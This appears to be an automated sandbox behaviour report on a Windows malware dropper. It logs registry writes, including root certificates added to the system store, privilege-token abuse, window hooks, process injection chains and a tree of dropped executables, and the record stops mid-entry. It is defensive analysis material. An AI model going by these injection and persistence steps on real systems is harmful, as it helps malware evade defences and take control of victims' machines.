Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Graphics.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

577ozCtS1we3ETR2TTV7uJro.exeOJ3gHl_HvK3bh4QO7iQQoEi8.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	577ozCtS1we3ETR2TTV7uJro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	577ozCtS1we3ETR2TTV7uJro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	577ozCtS1we3ETR2TTV7uJro.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	OJ3gHl_HvK3bh4QO7iQQoEi8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	OJ3gHl_HvK3bh4QO7iQQoEi8.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
4720	pub2.exe
4720	pub2.exe
4012	jfiag3g_gg.exe
4012	jfiag3g_gg.exe
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552
1552

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1552
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4720 pub2.exe

pid	process
1552

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exe

description	pid	process
Token: SeDebugPrivilege	3176	SoCleanInst.exe
Token: SeCreateTokenPrivilege	2812	Install.exe
Token: SeAssignPrimaryTokenPrivilege	2812	Install.exe
Token: SeLockMemoryPrivilege	2812	Install.exe
Token: SeIncreaseQuotaPrivilege	2812	Install.exe
Token: SeMachineAccountPrivilege	2812	Install.exe
Token: SeTcbPrivilege	2812	Install.exe
Token: SeSecurityPrivilege	2812	Install.exe
Token: SeTakeOwnershipPrivilege	2812	Install.exe
Token: SeLoadDriverPrivilege	2812	Install.exe
Token: SeSystemProfilePrivilege	2812	Install.exe
Token: SeSystemtimePrivilege	2812	Install.exe
Token: SeProfSingleProcessPrivilege	2812	Install.exe
Token: SeIncBasePriorityPrivilege	2812	Install.exe
Token: SeCreatePagefilePrivilege	2812	Install.exe
Token: SeCreatePermanentPrivilege	2812	Install.exe
Token: SeBackupPrivilege	2812	Install.exe
Token: SeRestorePrivilege	2812	Install.exe
Token: SeShutdownPrivilege	2812	Install.exe
Token: SeDebugPrivilege	2812	Install.exe
Token: SeAuditPrivilege	2812	Install.exe
Token: SeSystemEnvironmentPrivilege	2812	Install.exe
Token: SeChangeNotifyPrivilege	2812	Install.exe
Token: SeRemoteShutdownPrivilege	2812	Install.exe
Token: SeUndockPrivilege	2812	Install.exe
Token: SeSyncAgentPrivilege	2812	Install.exe
Token: SeEnableDelegationPrivilege	2812	Install.exe
Token: SeManageVolumePrivilege	2812	Install.exe
Token: SeImpersonatePrivilege	2812	Install.exe
Token: SeCreateGlobalPrivilege	2812	Install.exe
Token: 31	2812	Install.exe
Token: 32	2812	Install.exe
Token: 33	2812	Install.exe
Token: 34	2812	Install.exe
Token: 35	2812	Install.exe
Token: SeDebugPrivilege	3528	taskkill.exe
Token: SeManageVolumePrivilege	1404	md9_1sjm.exe
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeManageVolumePrivilege	1404	md9_1sjm.exe
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552
Token: SeShutdownPrivilege	1552
Token: SeCreatePagefilePrivilege	1552

Suspicious use of SetWindowsHookEx 22 IoCs

Processes:

SgX1XbXgWUaO_2LalK20rA6N.exe577ozCtS1we3ETR2TTV7uJro.exeDNDlYi5RpG9RGgDXfJH56bSJ.exeKCH3v59TQ6iq7ORLzU0vg3GI.exeRA0tv829vE9gUwMXg5jLTHZy.exe9MzAOHnGUGbcBbuRRGTTf7zi.exejjOxcyQKi5W3IGIPRLbt1B1h.exev7qCTe_5ROHvzrYexwJ3nCWA.exe0lsxOdR_NT0afutaQTZG02lD.exeuUxEvdY_irQvso47SQc1mZ5P.exeInstall.exeOJ3gHl_HvK3bh4QO7iQQoEi8.exe1H8HE.exeInstall.exeKD13E.exe4219M.exe4219M.exeIM186.exeMLHIL2HBLLDM48K.exeLfd3pjbM4UpOAI4yFoSv8bbQ.exeEIBcenHYIk6WJIq8QtLD4EXP.exe

pid	process
3612	SgX1XbXgWUaO_2LalK20rA6N.exe
1284	577ozCtS1we3ETR2TTV7uJro.exe
4392	DNDlYi5RpG9RGgDXfJH56bSJ.exe
3528	KCH3v59TQ6iq7ORLzU0vg3GI.exe
1308	RA0tv829vE9gUwMXg5jLTHZy.exe
1852	9MzAOHnGUGbcBbuRRGTTf7zi.exe
3888	jjOxcyQKi5W3IGIPRLbt1B1h.exe
2056	v7qCTe_5ROHvzrYexwJ3nCWA.exe
4088	0lsxOdR_NT0afutaQTZG02lD.exe
2100	uUxEvdY_irQvso47SQc1mZ5P.exe
4532	Install.exe
5096	OJ3gHl_HvK3bh4QO7iQQoEi8.exe
4408	1H8HE.exe
5064	Install.exe
3712	KD13E.exe
1936	4219M.exe
4208	4219M.exe
3084	IM186.exe
4564	MLHIL2HBLLDM48K.exe
4564	MLHIL2HBLLDM48K.exe
1200	Lfd3pjbM4UpOAI4yFoSv8bbQ.exe
3156	EIBcenHYIk6WJIq8QtLD4EXP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exeFolder.exeFiles.exeInstall.execmd.exerUNdlL32.eXesvchost.exeGraphics.execmd.execsrss.exeFile.exe

description	pid	process	target process
PID 4300 wrote to memory of 3176	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	SoCleanInst.exe
PID 4300 wrote to memory of 3176	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	SoCleanInst.exe
PID 4300 wrote to memory of 1404	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	md9_1sjm.exe
PID 4300 wrote to memory of 1404	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	md9_1sjm.exe
PID 4300 wrote to memory of 1404	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	md9_1sjm.exe
PID 4300 wrote to memory of 4568	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Folder.exe
PID 4300 wrote to memory of 4568	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Folder.exe
PID 4300 wrote to memory of 4568	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Folder.exe
PID 4300 wrote to memory of 4960	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Graphics.exe
PID 4300 wrote to memory of 4960	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Graphics.exe
PID 4300 wrote to memory of 4960	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Graphics.exe
PID 4300 wrote to memory of 4860	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Updbdate.exe
PID 4300 wrote to memory of 4860	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Updbdate.exe
PID 4300 wrote to memory of 4860	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Updbdate.exe
PID 4300 wrote to memory of 2812	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Install.exe
PID 4300 wrote to memory of 2812	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Install.exe
PID 4300 wrote to memory of 2812	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Install.exe
PID 4300 wrote to memory of 2244	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Files.exe
PID 4300 wrote to memory of 2244	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Files.exe
PID 4300 wrote to memory of 2244	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	Files.exe
PID 4300 wrote to memory of 4720	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	pub2.exe
PID 4300 wrote to memory of 4720	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	pub2.exe
PID 4300 wrote to memory of 4720	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	pub2.exe
PID 4300 wrote to memory of 1336	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	File.exe
PID 4300 wrote to memory of 1336	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	File.exe
PID 4300 wrote to memory of 1336	4300	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe	File.exe
PID 4568 wrote to memory of 2012	4568	Folder.exe	Folder.exe
PID 4568 wrote to memory of 2012	4568	Folder.exe	Folder.exe
PID 4568 wrote to memory of 2012	4568	Folder.exe	Folder.exe
PID 2244 wrote to memory of 3036	2244	Files.exe	jfiag3g_gg.exe
PID 2244 wrote to memory of 3036	2244	Files.exe	jfiag3g_gg.exe
PID 2244 wrote to memory of 3036	2244	Files.exe	jfiag3g_gg.exe
PID 2812 wrote to memory of 3140	2812	Install.exe	cmd.exe
PID 2812 wrote to memory of 3140	2812	Install.exe	cmd.exe
PID 2812 wrote to memory of 3140	2812	Install.exe	cmd.exe
PID 3140 wrote to memory of 3528	3140	cmd.exe	taskkill.exe
PID 3140 wrote to memory of 3528	3140	cmd.exe	taskkill.exe
PID 3140 wrote to memory of 3528	3140	cmd.exe	taskkill.exe
PID 2752 wrote to memory of 2232	2752	rUNdlL32.eXe	rundll32.exe
PID 2752 wrote to memory of 2232	2752	rUNdlL32.eXe	rundll32.exe
PID 2752 wrote to memory of 2232	2752	rUNdlL32.eXe	rundll32.exe
PID 2244 wrote to memory of 4012	2244	Files.exe	jfiag3g_gg.exe
PID 2244 wrote to memory of 4012	2244	Files.exe	jfiag3g_gg.exe
PID 2244 wrote to memory of 4012	2244	Files.exe	jfiag3g_gg.exe
PID 4420 wrote to memory of 4720	4420	svchost.exe	Graphics.exe
PID 4420 wrote to memory of 4720	4420	svchost.exe	Graphics.exe
PID 4420 wrote to memory of 4720	4420	svchost.exe	Graphics.exe
PID 4720 wrote to memory of 392	4720	Graphics.exe	cmd.exe
PID 4720 wrote to memory of 392	4720	Graphics.exe	cmd.exe
PID 392 wrote to memory of 1956	392	cmd.exe	netsh.exe
PID 392 wrote to memory of 1956	392	cmd.exe	netsh.exe
PID 4720 wrote to memory of 4696	4720	Graphics.exe	csrss.exe
PID 4720 wrote to memory of 4696	4720	Graphics.exe	csrss.exe
PID 4720 wrote to memory of 4696	4720	Graphics.exe	csrss.exe
PID 4420 wrote to memory of 220	4420	svchost.exe	schtasks.exe
PID 4420 wrote to memory of 220	4420	svchost.exe	schtasks.exe
PID 4696 wrote to memory of 2288	4696	csrss.exe	injector.exe
PID 4696 wrote to memory of 2288	4696	csrss.exe	injector.exe
PID 1336 wrote to memory of 4424	1336	File.exe	xeOr2IwkN6H_CsyE9rnxIde9.exe
PID 1336 wrote to memory of 4424	1336	File.exe	xeOr2IwkN6H_CsyE9rnxIde9.exe
PID 1336 wrote to memory of 1284	1336	File.exe	577ozCtS1we3ETR2TTV7uJro.exe
PID 1336 wrote to memory of 1284	1336	File.exe	577ozCtS1we3ETR2TTV7uJro.exe
PID 1336 wrote to memory of 1284	1336	File.exe	577ozCtS1we3ETR2TTV7uJro.exe
PID 1336 wrote to memory of 3612	1336	File.exe	SgX1XbXgWUaO_2LalK20rA6N.exe

C:\Users\Admin\AppData\Local\Temp\3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe
"C:\Users\Admin\AppData\Local\Temp\3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4300

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4568

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:2012

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 328
3⤵
- Program crash
PID:3560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 332
3⤵
- Program crash
PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 332
3⤵
- Program crash
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 660
3⤵
- Program crash
PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 660
3⤵
